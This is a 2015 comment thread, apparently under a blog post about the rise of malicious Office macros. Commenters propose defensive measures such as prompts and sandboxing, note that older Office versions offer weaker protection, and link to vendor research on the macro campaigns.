• Anonymous Steve Basford (Sanesecurity)
    2 Jan 2015 6:45 PM
    #

    They have been on the increase for a while now...

  • Anonymous adwbust
    3 Jan 2015 12:33 PM
    #

    That's why after macros is enabled, warn user if document tries to connect out. Check server/site contacted by macro using Smartscreen (on Windows 10 aside from IE, integrate Smartscreen to Windows filtering platform and UAC prompt for opening PE; Why also with UAC? Because not all files are downloaded on the web, not all use IE. Some are from usb drives; check against Smartscreen when they're ran.). Office is sandboxed right? Office should have sanboxed incoming folder for files downloaded (and ran) by macro. If user allows macro to connect out and download, warn/prompt user if macro runs a PE or script. For downloaded web pages, images, etc use a sanboxed viewer/browser. Put in Office prompt, that it is unusual for a document to download and run files. That would deter (scare) users.

    Does Windows keep a log to track process activity? Like for example, log when a file (usually PE, document and script) is first created (including source)/ran/modified, the result of execution (if it trips certain sensors), etc. That would make it easy to track and retrieve an offending file. Of course, user should be able to opt out. MAPS within Windows. :D

  • Anonymous Sandeep
    5 Jan 2015 6:08 AM
    #

    I have a IBM server x3400 m3.
    I am intall 8GB Ram but Operating System Usble only 3.99 GB RAM.

    WINDOWS SERVER 2008 R2.

  • Anonymous Derek Knight (MVP Consumer Security)
    5 Jan 2015 7:50 AM
    #

    The default options and the ability to use "protected view" were only established in Office 2010 and later versions. A very high proportion of compromised users are using Office 2007 or even earlier. We realistically are not going to see users pay several hundred £££ or $$ to get a new version of office when their old one works perfectly well, with features they use every day and there is not so good default protection in those versions. I don't even remember macros being disabled by default in Office 2007

  • Anonymous Kevin Beaumont
    5 Jan 2015 8:51 PM
    #

    This has been going on since September, detection has been very poor in AV providers for months now on it.

    Palo Alto's Unit42 has blog posts about it extensively here: http://researchcenter.paloaltonetworks.com/2014/10/examining-vba-initiated-infostealer-campaign/ and here: http://researchcenter.paloaltonetworks.com/2014/12/follow-vba-initiated-infostealer-campaign-exploring-related-malware-actors/

  • TammyRSmith TammyRSmith
    15 Jan 2015 2:16 AM
    #

    Stay smart when opening those emails!